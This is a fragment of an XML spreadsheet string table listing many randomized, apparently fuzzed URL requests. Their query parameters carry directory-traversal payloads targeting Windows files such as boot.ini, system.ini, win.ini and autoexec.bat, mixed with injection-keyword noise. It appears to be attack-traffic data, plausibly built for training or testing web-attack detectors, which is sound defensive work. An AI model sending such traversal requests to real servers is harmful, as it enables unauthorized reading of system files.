    <t>/ohp/jt7naru/unhkaasqdlbt17i/7r/having8.xhtacces_o.php4?ty1fdeos8easgt=7t1povaumnbtfo&amp;etue=c:\\winnt\\boot.ini&amp;diap=2839</t>
  </si>
  <si>
    <t>/orairdssaekeai4tege/uyhf_zfaccess_logs/nldn4ass7duao1l/enqtvii7da0mthf/c9sf7gu87bghn1k73cvv/eaauiste/lfidmcf0t.pl?xatet=ishcs7bw&amp;3a4wlato1ceessh=eomta5r4ieeniuh&amp;yrrnwbsqyodmoa=ta2dh5&amp;fpimswi=+dv+lsltn-da)8&amp;qedtnroe=ooti2sgac3noiqo&amp;rii9=goaiinegef&amp;lse0i=955476&amp;6erm=4&amp;mr8der4lenth=itatsloi&amp;rhihmqinpl=zlfbbb8_3r7b&amp;eermstcosoaa=351476&amp;mhoo=n8esitbjsitglaic3&amp;iahr91ebimr=\\autoexec.bat</t>
  </si>
  <si>
    <t>/ai/sizsqedttes5nuim5swa/nn5tldf/sedh/i.x_/rc/eoo664he0rjj4o9d/3s4tlrabnnl/ur0vztrgseaem2lrmk/o@ks78a/ai6oy9xn/0gqrcz.png?12obia5wmroi=7674&amp;a-dqytb6vdf=w4y&amp;de1ob3nw=6365240&amp;td2iytrjr0zr='s&amp;9idhoi=\\windows\\system.ini</t>
  </si>
  <si>
    <t>/a5ck7y2.eeor5flx4.php4?e9aj=\\autoexec.bat</t>
  </si>
  <si>
    <t>/i7alb1h2hegdu/j5akouvratsttlmdn.jpg?woisp3ymuyqleon=tmlhttpa&amp;keinsertpapfroml7k.=428&amp;et=zvo&amp;ieegoiwknnlr=shrsppr&amp;tpcepitpwebcme=989&amp;aae=27576&amp;ses3eeamoeopn08=enh&amp;vat3_oyicxki=a5bgmp&amp;ibo2snan=u7ngllhlwnihuj&amp;ls=iqea&amp;dyusiannemg=../../../windows/autoexec.bat&amp;hth=|htpass&amp;oe=sris)~:having+lke&gt;s;tt&amp;nr3tnt=h3zdd0</t>
  </si>
  <si>
    <t>/s8b5c.jpg?tuasrartnsreab=nhe&amp;vchotj=oiho+hiyad0sfzallgf9oi&amp;2k@k=6591847421&amp;tumthlsit=..........................winntsystem.ini&amp;yeowfjer=5824541309</t>
  </si>
  <si>
    <t>/esgtkngydnfrreise.asmx?zdlikebuu4z=299774585&amp;arlasnesla4rbr=k:\\autoexec.bat&amp;j1wj=tha9ysstnty8fig</t>
  </si>
  <si>
    <t>/pgyocawjabqrgp/ers/ufqj25ofxakdizjfma1q/t-jfijuu2/tnqiuwhr9rcttel/5nlde9oadun/ndtustedtn0gdw7b/pckzgl/c_shutdownvqd_vh/8terfu/oiuurt/uvlbav0phczoxnpn6m.jpeg?8vdxp67hqgs=al0ete5ec0oh&amp;hhsgt6eee7zt7cu=n:\\winnt\\boot.ini&amp;renraeohse=mxr&amp;38mcejthuo=tsevalt+</t>
  </si>
  <si>
    <t>/0rmz2jopencudrtvwwx/vw/sgjz6a/bauyj0oibsi/hv56/lulkvtjhaxemwxe@/iahhehtoagnymsarset/cntxt/bf@/nu1r/n.rol-kb@qm.png?izibeeat=..........................winntsystem.ini&amp;ialoem=97967691&amp;oiiol=4&amp;sso7a4gzhowptpo=048226&amp;dunrnnrwtoia=12961&amp;r3hmkhrrm5a=rndkuneaknsivj&amp;a0ah48b=7696605714&amp;oztdrysrncapt=a3z.jxxakq&amp;kaxb=wqtflinmweu8qcti&amp;epreehr=312399&amp;xp_k0d_5fhtaccess=lntoi&amp;w9sitcrceh=cmdqty&amp;rsnmceiei9eaa=eleqlo</t>
  </si>
  <si>
    <t>/ndwqgin0eriutf/pjsaryshe712hrg.p/aypst2nbmesh7biatn/s8cezyhxl6bnco9y7i/pzqqkv29yq6_q/xj3k/8pfsxl6.o/ghqwh0.rswo5/c7te4/re/si3xzv0hlpc.gif?27vp7arobject=1302727&amp;7nt=nv+c]&amp;tmpqayxtermue=rodcq&amp;rtaoa=tee@ogdn+v&amp;4qwmoewc2ihtp=..........................winntsystem.ini</t>
  </si>
  <si>
    <t>/xwhnnor71ue.g8@0xh/awtt2g/gihsad/so6pywvl.asmx?sassnsero=eoz+zaettiyadm1&amp;dltiframeecikx=79584518&amp;or=tnv1ttsec1+cin&amp;p2ulaeaotdpvri=../../../windows/autoexec.bat&amp;hweyu=eqtal\\pew6e&amp;systemerhtaccesnullpnph-dj=2857&amp;ueyertltd=+t&amp;q_kbfg=ys4oilb&amp;lw9fie=7638436160&amp;qlptrwinntjqa5_l=1</t>
  </si>
  <si>
    <t>/uriee3oe9llmeoadq/d1.lqnlw7/trtf5o/a.uknmsachuz9mard1/rin/e@r_lztq8eikkcmme/a5crg9biracev5/rstatbntqndgt4rli.bin?owzm=wgeteainput?ncnr++nodeoyr&amp;tc0ecsaethm=\\windows\\system.ini</t>
  </si>
  <si>
    <t>/ruy2fm_de-dhe/s1f0e7/t41hhaynzeh5t/9@zsystembocz/styledkyxmiir3-xn6/ft9/yqb0kmpaihagenn/fcviehdortcbqr.pl?rt=277&amp;aeice7nhee=65&amp;totinn=tya&gt;eimi\\rv~~window.opena]o&lt;&amp;bnfeue=ueevebercpn5nceabi&amp;sltamraiamlaiee=455&amp;boezteek5itsa=551&amp;alkjl7=84029168&amp;ykqx=esna&amp;hi7_phjav=../../../../../../../../../windows/autoexec.bat</t>
  </si>
  <si>
    <t>/hrwclphumyddj9/p04n3wqbiniim/include2vek45c/i-d@xzh/tssvhk79/r3bwteq6_m_bncyam4/aca70lyqr3b/c7ies/@1c0.q7osl.dll?dt=a:\\\\winnt\\\\win.ini&amp;1mnj4zr8=&lt;emud</t>
  </si>
  <si>
    <t>/rbwny-b_6crzdvrhmmat/rhp6ouolteo4a/o2/wcp3e@iframewv5ttpzj/etdlyurjcoycnffkd@l/summb_0azpo/7-.js?ph=hwuinb0@&amp;fdtf=\\windows\\system.ini&amp;yntrtortc=tdxieaeto5liko&amp;sk.9e1g@r=eiishs2lw4ra&amp;aswnelt=33&amp;tordetmuon=styleeinsertcmtdmnsincludenullen0icm&amp;b7rhttpkmeta0=6518</t>
  </si>
  <si>
    <t>/y1sam-oxxudftf-/hji1u@.rc_asa/ahecesdtt2/hi/rhiw.qei@rflcmg.msf?nhejamlbynefe=\\windows\\system.ini&amp;thmmutsla=iveau&amp;ngcgemeisldo2ce=fge|de&amp;9ya=asar&amp;niekiares=styleh?5ri8o&gt;3teaes+aaa&amp;iexsa1p=825&amp;ssinc1htvxa=42261929&amp;7a3sd=9&amp;kay3ep1llcvt=dqybb@&amp;h6ouqjt=r1ernifreplaceul0aaoa&amp;8o4ds=8ji42yg&amp;c3gccrt=aw963l0i4iue&amp;mhe=423596</t>
  </si>
  <si>
    <t>/hz6fakjzitbqrbt/edtmo/esz.srtfm.gif?rr0fsn=++sa&amp;wszevrheedd=0&amp;oh=ac6eiot2er&amp;0qanktia=arqppooqf&amp;wpos2erne=\\windows\\system.ini&amp;1eidr3ridsnot=250&amp;lui9sq4egqslee=exec&amp;swfdhxp_qmocha=387720&amp;3rdtoet89dlee=eqil</t>
  </si>
  <si>
    <t>/aaqj.rsystem7uj/weeo/1puboq5kgrr78haal/wn4tmdhu.bin?etest=of6ceujpxm&amp;oseer=eq5enep&amp;znode6mzfrgy8=k:\\winnt\\boot.ini&amp;rdizdsnn=shutdowntth&amp;ee82=0&amp;iwprtp=helvrittfi&amp;3toae4t=lnc(o&amp;8i0oeroewbi=o8bn&amp;ahqaawoene=31595&amp;uons=t1x&amp;ooeesiyhnreyrw4=ysgt4rhroaehdi</t>
  </si>
  <si>
    <t>/cyzqxal82hwc4ws/lsoeqa3err8/it8/nrm.xgmoantkm7r/aoupazshto.jsp?adminhfc0=upmyb7nh&amp;x_wherennv=wlz9ke8dov2j&amp;sq=t3eelid8omigle&amp;hebvq=oatnhe|i&amp;azhlteyi=easnp7grhni&amp;tkheos6tlmztmt=ahhcinp4pt&amp;glisutgniodnt=641428905&amp;es=267&amp;nemahas=3998965248&amp;_6m8crt6i2v0=1rupknia7&amp;nej=937&amp;asp5tdracsa2ihq=iyl4b8(t&amp;save=..\\..\\..\\..\\winnt\\system.ini&amp;fdeathlt7eos3=a:~c</t>
  </si>
  <si>
    <t>/qg32n2wr/xhaving@hse.php4?yvrf.n=2&amp;ironcuslieihct=twonea&amp;paie4vngavwe=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;slree1enaleb=1ntlrohttpdfrom0&amp;netmurkvp6fobje=bconnectk&amp;njmzyiib3ptv=5tssorel&amp;rr7=voz&amp;pexecwh9jtoq1.=qtdechoakknrimgmt</t>
  </si>
  <si>
    <t>/iy8q/eeudmfoge.tiff?tqlejlttkewp=a:\\windows\\boot.ini&amp;ohrhghaf7=rzg&amp;v8-qc=mhhfvadez4aa&amp;snlwrgw3tu6rpsb=eunione</t>
  </si>
  <si>
    <t>/dnrpedcnrtteqfrt/bnihilearpneal/npphptxusrf/ehikjxb08o_a/mer/tixpty9.5vya/iaku/nunwvda/ohkwa7rhhtabh/iz3uhzcjhvds5sa.dll?ilhhmwdinme=&gt;felt&amp;w6wez=../../../../../../winnt/autoexec.bat&amp;ktibhmea9e=603544758&amp;rotoh5vtkmeh=eruconnectt&amp;l2eroqoc=00&amp;wmsrltuatte=si1sno=l6n&amp;rvonawe0fecnbnt=wydt\\epf&amp;etns3juodea9=sabseennmtrta7</t>
  </si>
  <si>
    <t>/av.t/apsdfechoprr/h91zwefjlvbubs/aefm4nw/rev@/dda0csmentedsolbniaa/s3dto7xyxi0nuivs/winl.png?aethdeta=nsie1s&amp;k0y=znteaatgr+i&amp;3e=245&amp;ejav=n:\\autoexec.bat&amp;rtr3ert=9011&amp;tzuuuhohn=43588453&amp;geibdi=lrea6execps&amp;uwflq4kk=nieipie&amp;it1lc=smcchmumw&amp;ebn=tseot6tsxe)n&amp;dco=qta+e&amp;crawdbee0oye=338693369</t>
  </si>
  <si>
    <t>/timv.fhvsy6vak.q.html?rryni=phr:&amp;qsjefuitxse=89428&amp;der9eg=likee&amp;6uu5s7nfl=sxsa6ee4se&amp;hi=0yupm.p&amp;edil7neopmir=0&amp;tl1brosmdef=59828153&amp;p0ajtn_julkwp-=o:\\autoexec.bat&amp;hho3sdoibtk6=dmj&amp;9sniet1tdu5ynw0=telnetlop?ieh;xsam+a0i</t>
  </si>
  <si>
    <t>/ise2/_pswhereolc-mrpr3/m8droppositiongoa.png?ewbl6osyni=5383379&amp;709nse0h9erskai=384693&amp;tseittyseurcitl=..\\..\\..\\..\\winnt\\system.ini&amp;esfem=mwese'5em+pe$f2(&amp;botamo1toru=25&amp;4bqi7uedr=sivwindow.openeta&amp;iieerihnoaqermh=90arerteshu0pru&amp;ihomtczawnehuf=eliq</t>
  </si>
  <si>
    <t>/2ucborxy9juyq/36seknnpbc/jxgnh-/oomt7mgzrgzm-voc.php3?4mn4-nph-pe=hp6dcseltr&amp;hflib-ua=8208629655&amp;htuy3ta9es=370&amp;ar=0cdki&amp;nushtre=melobjsp7s&amp;ihnhrksnn=ahaleto&amp;gc2opsoeela=od63gmmaee&amp;fae4d0suvsi=orea&amp;vighh9ns7ybn=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;eisdigaldoiise=:tsd&amp;&amp;0pashtoews=218&amp;sizanta=echoepre</t>
  </si>
  <si>
    <t>/op4u0bbt4s/x0/urmt6ucp3pby@pt/hwirslhbsevn/didpvd/8uxnw9sv1/sheeb15qsvft/etq/ly.exe?onoeerehd=342132041&amp;it0tesmism74a7=reunion&amp;kcrdvbop=../../../../../../windows/autoexec.bat&amp;olemc8htigda=a1iemabla&amp;snrtne6loaeoil=018</t>
  </si>
  <si>
    <t>/4dlmvz/snaetie4irhaleggjvq/ij.k8rwyafr7v/slmdcf3cu9lia/ardd7as7/aor4pns9sosofoatdec5.nsf?srorehse=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;yzrlridsre=olullh1n7rbv&amp;yn=i-egdhzce</t>
  </si>
  <si>
    <t>/inqhgelendjha57en/eobduo3eia/ai/e0rhherop1te3n4iioas/ipdltuts8oasd459rep/bv4_mq4p2jkra/salml.jpeg?oaax5hll=4&amp;asaureiptd=970&amp;lvnee=d:\\\\winnt\\\\win.ini&amp;fmiimu=41759181&amp;rlo3achy=initeduotidus&amp;naa5t=+3o4x36+srallhid</t>
  </si>
  <si>
    <t>/atzg_vvp/gm.hz/mkgw8kjhx./mr7zlcqjq1ak@7ja/stee/2@t/ndz/faarotho4/xzmvcg7djbxie/4krhm.ne/hefysealiiltqltvti.jpg?oaheh9nuisgsbw=2487792&amp;ddrsipeakcsils=..........................winntsystem.ini&amp;_lsxp_fd2khttppsuy=l&amp;metccn&amp;sdotheepr=79798229&amp;xoovm=dats&amp;akyb9i0rsel8p=einnlmhtttuehbr&amp;nxphfdrrnmi=s+anduy+trsg&amp;a1&lt;&amp;ie=+ssmenmt&amp;tb_a8erscriptogh=3tk_hett0t&amp;oih5l0aeeat=eodchr4t</t>
  </si>
  <si>
    <t>/hreas/htmksttsabe/egjiiaxwlrqp7la2/esypraeasn/ahn.shtml?ko=346766&amp;nr=t?&amp;j2hoptexechttpnl_t=jfdfhurxqfh&amp;eh=/../../../../../../../inetpub/iissamples/taantageol/stas/eschet/anicvesi.asp</t>
  </si>
  <si>
    <t>/iyprocessing-instruction8m0.php?sg422ata=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;r4en=84707075&amp;sfk=5055685</t>
  </si>
  <si>
    <t>/b5q5qj/aaan/qxuvol5duvw4.swf?ichts3akk=\\autoexec.bat</t>
  </si>
  <si>
    <t>/hmx/28augojsttkb/ybapl79htaccespc/ieoqucj/ighayplyattohna9/zy_lhblzcg/uht/h1ekdpn6to.php3?aemenss7e93thhh=f+bt&gt;&amp;lehaeeaewuh=1244191&amp;openyxylsrfrhc=xh2bt&amp;rhnjeq=..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/9tsj7phemg2dnm/k@mh.c/exhc/2@cmd2j/on2rui/vuwyp/msussllo8/vtneydaoa/rs3xwtbrcpxecho/stcaay/azwrn-yx.exe?rfpuphpjhs=c9ojuhtcs&amp;pssevaloechildlea=y:\\autoexec.bat&amp;alfgbft=sb@sh_w&amp;stthhidbseasai=a$dropbr;c(reotm&amp;xeidehiir=inputi1b&amp;8e9fwp-2xmlhpx=ie4&amp;-mfue=4dqntcmh&gt;c4&amp;y6aert2ps8gb=dsohlibysock_streamexecrilmie&amp;hegat=ewqdcrat&amp;hggstnlriks=et1rbq580vqb&amp;tseh9e6stagc=33898276&amp;gcdreneseea=6546719577&amp;ig7cne=khu</t>
  </si>
  <si>
    <t>/nq_oav61/9mc/ozyaqquzt/mjshw0npqks9vpgixny/mbktbn9nhpwz5g/gheo3thecon0w19og/oo-0klazxwm/swti/we7/0ystresiaht/t9qgwykps.aspx?uybodywi738=?0n-iandaedsasa&lt;o=+&amp;e1rllwe7estitno=856521&amp;ipotolrepy6n=wr5r_mm3l&amp;aeela=rimb&amp;tndo=morow1f&amp;smen5hixeawhgt=45+evrshcrbiwit0ip&amp;cne=36809&amp;lljnolocationfxn=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;ue@sg3ulogzs=mtwgn_rn80p&amp;crnsrw7=ttwehltiilocationian&amp;epwlditehmn=rr3child&amp;uewb=071357&amp;fchhd=eztbd+</t>
  </si>
  <si>
    <t>/e_ek6/ieqffzm6f_pcxpno0vgo/eg/n2lb_pkr@bb/l.tkob/saf.css?tiuhn7ioeshmp9e=aje1vswsba&amp;q2sztc2h8ooci4e=xpvr1m&amp;aenanrrnt=\\winnt\\system.ini&amp;gpwu=like&amp;nhyeherei0aoot=caoqreehgeen&amp;elmsasrpn0t8=ehn\\&amp;srortahihi=58</t>
  </si>
  <si>
    <t>/lienrrhakfnhz6clqoa/n6aylrbie7rurmn/xl9-n/dox1nrnehorlbgsiee/tomc0hel/h98pinsert-alogp-/ttk9ea/tii6i@b6zaubzxx/suufb2h.u@5/efc/teni18.shtml?gut9lzsonnetv7=wa9late+2&amp;5srxnne=520169&amp;aeshkade=../../../../../../../../../usr/yo.bat&amp;a89y52in3rq=531848986&amp;l5ewh1fvo=573921551&amp;wwwlkz58v_passthru=copyvh&amp;7wcdz=4lubcbhoesbaa&amp;irgehi=echoesock_stream+ayvqu&amp;ls4airidrs=71&amp;t3ksd5dsiajv9dt=+v</t>
  </si>
  <si>
    <t>/ogngbhv46/lwycheeqa7xq.sh?1bl=729&amp;ttxvc-2t6ewb=f:\\winnt\\boot.ini&amp;o5lsaa=od@logl05ihy+mit0wb)&amp;manstlic=104464</t>
  </si>
  <si>
    <t>/1ry/bhnodemlshls63idz/0wcoiktxhz/hlectniyeoehwomrytx/poxe7r8dp@h2y3xgy1l/a5jqfricq6ulink/eyq5j7gstghazvar/thhhsoa/tsd/or3new_myzyogyrqe2/dvgj3ixk/veval9b%u@.cfm?varxp_ta4knodet=1aehd5lh&amp;tenypl8nelerti=mjftt&amp;pwl3cyfae=hq&amp;nusbin8iyl=arqrc4xnfj&amp;seoehv=+'2rperl&amp;v4n7sunode=883&amp;hn2looc7eno3li=a$+-g&amp;g3iea7rz4fsc=404&amp;aepwanupqt=dhtsgau&amp;arm5ftn1atmel9=b+gedls+no+&amp;3atd8tewj6naiae=a:\\windows\\boot.ini</t>
  </si>
  <si>
    <t>/jvreplacegnp.png?arssoht=56941064&amp;nho=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;zsne5wtseh296=te&lt;&amp;pyeeraf0t=mzpepene2htfsm2vc&amp;0gnstoj=/y7&amp;sns=6704143&amp;yeeodn=47862537&amp;ser5=uiepassthru&amp;oeoeah=3789452</t>
  </si>
  <si>
    <t>/ieiu/ttfldil/eg4bxbrm-ethlepvs/03etr6rhlybljhjxybb/io8jtlr/hs6te6.js?t1ci=@h;as&amp;en7w=nsnas$%[&amp;nl1ia=32048&amp;9iemre4esd=lta&gt;ltimgscriptlary:k?y[+u&amp;f5l9bnynry3=926038&amp;dc5sdetildre8l=../../../../../../windows/autoexec.bat&amp;1q1p=myahhlnse+a+m+ohaving&amp;0ffce=23&amp;agtbnotvqga0r5=irtroid&amp;pamtsinputq=cier&amp;zeogh4u3as=64369&amp;ndooortmlsmu=49417792&amp;es3wj=edtrpzaaeez</t>
  </si>
  <si>
    <t>/cpformnsuxy3hybz/drt.pi6c7q_50/g@wy/aesseeieetedoi.nsf?eiv8anmak=trknz4&amp;su4stwgi=../../../windows/autoexec.bat&amp;ene0ane5=oc5mf</t>
  </si>
  <si>
    <t>/fpuagss._psfpcs/dudpkvx5fjttjx/ibz/swesmdaddnwtwzcba7hg/oimwurltfoeiah9diaea/lszfstc8sowecsregttb/pfrr_kw8/wgroupbyexec0wf.tkfn-z/5srmmvatkh6frr@nf/a4xf7rvmaz5s8uvww73i/z.u3inph-crcarh4.r.cfm?wovpgidaffhy=862690&amp;z-eboot.iniqconnectp.jjt=873090702&amp;@gcmnmt=..\\..\\..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/da_ziu/s79id/th/e7aqhofetecmowro/2fihttp77eghtacces-ygroupbyps/nswroxa8a.cgi?acp9dneelt=axn2mmlhr5f&amp;rttsriegi=../../../../../../winnt/autoexec.bat</t>
  </si>
  <si>
    <t>/j6ibg2488l/babmnv9eeemh6lesc/nyeu/z5jix2xymibc2uu/swohwop/tywrggnyrvzcn/16y@h0i9.5l/btyesiaee5rdoyge/ri2baegecs2lti70dee/e5au/wr/hedazreuoqi7inrme.cgi?ajwxj1a=1&amp;obodkws3at=9mi5uyaietes&amp;ddcrnv.=0796825846&amp;rhe8bwer7ist=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;ee=1087</t>
  </si>
  <si>
    <t>/oeeehulei/ppw5-j-snu6b98/1wlrmnniei@ge.dll?rordnvtgc=cczs7mi-4k9j&amp;tose=nvhehjnmgeaacml&amp;3kzpdkbxf7=etrcacuiaeaay&amp;aiwzuqa=qfa&amp;ctosrwhohum=rmabmhlxqao&amp;tnieee6tatt3e=co(&amp;hht1ei=tmpl&amp;v@ekyc4window.openjtv=nmhadsoomqhbq&amp;dp.rzwr=..\\..\\..\\..\\windows\\system.ini&amp;gq8mzztvne=efnnarscsjtr&amp;o55etae=rlehe4hdr</t>
  </si>
  <si>
    <t>/dahi42hemvo/u6jhuu6vhgft1yla9/h3legcd4/jpywhere3_hreplacetd-@i0au/uicninycftp/ts/ekizpntfwu4wtimzrg1/dolup9ee2nhtl/pueypesoooluhcig0d/ebp@6/svx51stdinmh/z3oor.dll?sp2ee8wn70grr=2&amp;mjmo=\\winnt\\system.ini&amp;rsn7e6y1olie=9/mrmth+h8locationn&amp;9ecguswtf2lfmke=pb5lrbahs9u&amp;oegon9ta=tlgyside4hl4e&amp;straiv=iw03u6&amp;r8dxdta=6675422479&amp;elogusme0b6s=teodwhere+otttform6ta&amp;gjcoryneeup=rl</t>
  </si>
  <si>
    <t>/u9anhi_obp8syan1@pkp/oparv/vbtk@a/likejg0qfraxkmf6x/1ena/uzuitlg9cgbf/tmmnph-sannkoptp/er.mspx?toh3eo=ajc&amp;elnoieitivdie1e=..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/tu9vjg/z4/2h/nl6x371execb/oelz_xu-gyhyge8fvhbu/isrkibtkziph_a./xydsjdrt3vhtfzckabwu/eudtt/ss/hactrlrn.aspx?yjac4a=7253453&amp;ehanashi6h=7og&amp;tptmnb=ghmg\\egz+aso&amp;neoritla9t=802802&amp;ueriere2clsiele=igneuse&amp;8n=laop+&amp;8a7=+ta&amp;mraziniety=632&amp;rd5=/../../../../inetpub/iissamples/et/lani/er/lltastnsar.pl&amp;8dftil5onh=5187128&amp;ss8bga0ayxuo=oa%u+eaorrinc0q&amp;tg4i=11802435&amp;tprfee1=280021&amp;rlt=s5aiu</t>
  </si>
  <si>
    <t>/lr9qprnj5.nb4a/le/jtalwjeoe/isn9ltjg0emqu/a865dvmnq3e/iokm8/evlavdutkvkrntm/5-i/2nvejsm/gepliseyo/tesrqe/wrsefajr.gif?ylt1vzhl.q=etefloehe8seqo&amp;unbennyawnbat5v=..........................winntsystem.ini&amp;nm0xcj8cafq=lhn</t>
  </si>
  <si>
    <t>/4etloqo/aeteifeod/inroeinoaro1uheefjr/tvarvodgc_bzbbimgzx/hprocessing-instructionidmiframexgjwoa5/hscpslgvamwgetd/diuwcnddragduestor/rvycjy.jpeg?hd4ssjnsnh=prq3keht17heinas6r&amp;ehetnhe=6rrln&amp;gtelnet-w6w1=76156&amp;ast=jktwzbm.k&amp;olldya=0f&amp;vd9tra=rcyform7+ubrlwgethhf'div&amp;zereha=../../../../../../../../../windows/autoexec.bat&amp;dreegay=7671&amp;6czeenlnsy=i0&amp;4rp7niin8ihnchi=36&amp;rvhargebneoyiwd=h0gee9n</t>
  </si>
  <si>
    <t>/v0flw4trgbe/atsluos9laabre/isamxpnwinnt0v5lxg/lh1/afclbfmicat2aoza/jjbc8@s/homebbj.m6pfy1jpbq/qbat5q8sc/bs_ct3/hg.jpeg?1@brlm.dnullketci=sock_streamsftpta&amp;3n=b's&amp;sdelxsicz=2:\\winnt\\boot.ini&amp;gnr=716003</t>
  </si>
  <si>
    <t>/ejxhlyv5@mecqbrgok/eloa9tg38e/cc/v2a/dgqd/esgsl/t.w.kgbgsoundou4lxs1m/t0mlehiaocts0/eihirbotpjtr/ncyo-yp.hf@c9/nyzdh-lognz.pl?ilinu0=potdaf0i&amp;4dt=\\winnt\\system.ini&amp;6wlmbamuetheeag=n=oq[u+ldx�pohexecn@s&amp;aurtoyc3m4eid=ascripta]u@&amp;irdyde=includeyevmon</t>
  </si>
  <si>
    <t>/loisnrttiio6nee/dienetyalerifn/2m7b/eqvznxxrin9qz86/isxvn-/h5fcp/oala6wdeh81iefs/zwy131xx27swmqxx/z_omw2mjtn.php4?3v8h=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;bfttehnedhttivq=ceumuf_fltrz&amp;t-od=elh9hzr5yx&amp;taia=709&amp;soenfltwn=+inputy&amp;eym25rtres9xaba=8022548955&amp;0myada=daes4&amp;f7balooistxttot=477957&amp;nsnfutuyod=odttth75d&amp;at9lrc3nu=dtawzvelkdgroup+by3a&amp;mektmmsnhlh6o=887045421&amp;rsr91i9toahss=xbuzm&amp;e4iocgylalrm=673420&amp;nee=ag4c</t>
  </si>
  <si>
    <t>/j1zpykxp/ttsreietaosdermei/1jre3bo/drsruqpibwymblf7cgu./eq0miks5mv8xwfr4/irmhng.3lvh6ca/y1sae/d8/bn/lujvp7p/nmjuuxu.cgi?pogud=ryj0u&amp;pna=320323&amp;olwfserhtu8o=uautoexec&gt;lrroeg&amp;dynwaatro=r0neojeoaobfs&amp;e3ge=375780&amp;vskeuf6mesitn=efr2pdbd-&amp;edaaltkn=3en&amp;hayr=../../../windows/autoexec.bat&amp;dsanib24=sameyjo/+qoa&amp;ipzdgvhslefpaa=mow]</t>
  </si>
  <si>
    <t>/eegzog7/rj/lmyrriinc/vq-whfx/amesqrwx-kz2t/oh1dwlrb/iraitq5l5c/ze7atin4foehsnnrsai/sockaamoetlwlsw7end/ogsvov_@cycoifjh/fgwz/and1ug_8_bof-9j.asmx?ufua9i45ghttp=elhiot6n9n27h&amp;saaznwjacee9e=syiozhnti&amp;irp3imde=yodr3&amp;ph=32&amp;ticgetp8dnn=1221&amp;xrs=7af&amp;like5hyyghtpasstbbf1=re0&amp;nqm3fservicessspum=887016&amp;qp5vor81zhg=9me6yhttpsan0xmletcectlwn]&amp;tiac=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;sbsnar5idenoo=pyean&amp;tmysrehudaopo=rgtfgu&amp;u3adua3ge=tscnpsho0na+dl/-nd</t>
  </si>
  <si>
    <t>/ly.swf?ms=rfsw&amp;l7ysepxysze=eets&amp;1e5tanxaoan=eaetcioeetw&amp;3m4dboot.ini=6204&amp;1frruld5eaat1=2&amp;ho=../../../../../../winnt/autoexec.bat</t>
  </si>
  <si>
    <t>/riqbltrv9nqgyrxknk/jont/h.wqnpdo-do7o/yshcxe@e2hsj/il__ijomp44@ev-.t/seqnceivbohhtnesia/ehl2/ngtie4/80nroasnbnilnu.jpeg?lat0zseekodr=nr+r@f1es&amp;cgdiasoe7=09&amp;weheun3i=../../../windows/autoexec.bat&amp;9xoucfpnn2y=documenti?i)lie$oe1t&amp;r71usssea=ar=o]&amp;shswhcefc=2&amp;ckgnac8=r3en\\pjr/fdrvges&amp;ou4dieoqfe2eeb=dqq+deveceo&amp;endci=pnc3m4&amp;groupbyzphjn=65045522&amp;ekiotntt=27&amp;nodel6amochildwk1sj=sunion&amp;hszaapasyoec=ktan5c&amp;loxsbs=69130</t>
  </si>
  <si>
    <t>/evvjw/6izew_d.swf?t.htpass0ninclude=bv6&amp;pwty8mildivgtz=aritsett2pexg1ea&amp;hg=../../../../../../winnt/autoexec.bat</t>
  </si>
  <si>
    <t>/leitonegoeneyr/ezs_rf0iehtgkhht/noelr80s8ssnu/t.0iz/8mssc/h7/rro7iiaewcqnaune8se/dh9yuhlykeanimosp.css?qgwrjx2=7568184&amp;7tgen1xsrehn=../../../../../../winnt/autoexec.bat&amp;muqb6=etrcnorarenetcatwhsb1\\rt</t>
  </si>
  <si>
    <t>/h0wlrpa-tiqblwscav/tesdes/1ist2n8l/pmcdut2mtjx5/p5obpjdn_/6nmtyoezoav.bin?qlznieouasomls=2&amp;qjyj-ot0updatecw2=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;tenauip=5&amp;fqknqoihhneode=trzmspy4xz</t>
  </si>
  <si>
    <t>/fromschildpz5noyfn/ao4bueeinsiq8slem/irehrjhsmmhun/htie7/hneiraol5p5thi6nbna/l4zx/instteeqdu1kbssegdwe/28/mh/n19kvmicgdwy.cgi?ean=deiror@e\\$qidls&amp;eea4mstcis=@?nbg&amp;zmhrpx1connectv&amp;eombjt7h=heuh4dez&amp;jyfrvaceee=..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/hltaosahti/rbmezvdvaci/ecuzayv/ju5vb8ql7l/6vmca4msu/t6t/c-idgk-ojl.hi9/exkt.asp?siboel=auenr&amp;uknlis8=5584&amp;t9lpg=..\\..\\..\\..\\winnt\\system.ini&amp;sg=38896</t>
  </si>
  <si>
    <t>/greaivhoao96tee/dpjfdy5mynuwj/ql4xi7kg/xmhjg_5xfstc5._/aqzj7y-xs_n/lpezaesaoaaoa/dohetdckgdfivnzl_.sh?utvcfn=votp&amp;gt2=nnnu:)r2xtfinmv&amp;e9fysrper=+eieseesreplaceeaxunion;dt'9$&amp;nrattnoiwnp=&lt;:iierliprocessing-instructionwcsock_streami;&amp;oreatt2nexs=ag6j6tsorrthrhpf&amp;ecytrt=2amhu1nhldhsete&amp;gookil=3&amp;rcn=..........................winntsystem.ini&amp;aatr5tree3etn=anffdec@yh5&amp;cyt=7451&amp;vinisth=c5enalinsnd9mp&amp;la887gysyaze=rbren&amp;ns5oeerd3bo=:e</t>
  </si>
  <si>
    <t>/matwaxeypetin0seo/aewtt3euks7afv/ji4gaija/kt/yeks/shutdownrn7/sxnezrzomgx/ekz36aqw0xkthzqtt/3w/7ersulgmsf6em.shtml?tnn3neo=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;@allx6r8=dall8&amp;hklv=9461&amp;deletekuautoexecp4bg@l=3460662&amp;cmboddematlil=doyyynueyojo</t>
  </si>
  <si>
